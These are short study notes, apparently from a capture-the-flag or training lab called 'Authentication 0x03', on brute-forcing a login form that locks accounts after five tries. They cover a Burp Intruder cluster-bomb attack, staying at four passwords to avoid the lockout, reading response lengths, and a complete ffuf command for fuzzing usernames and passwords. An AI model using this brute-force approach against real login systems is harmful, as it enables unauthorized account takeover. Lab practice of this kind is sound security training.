Authentication 0x03 [Challenge]

The account will be locked after 5 attempts

Choose cluster bomb (see the reference in the tryhackme burp)

add $$ to the username and passw

choose this wordlist for usernaem

Try 4 password since in 5th try it will lock the account

See the different length

ORRRRR

copy to file

ffuf -request req.txt -request-proto http -mode clusterbomb -w /usr/share/wordlists/seclists/SecLists-master/Usernames/top-usernames-shortlist.txt:FUZZUSER -w pass.txt:FUZZPASS -fs 3256,3376

Last updated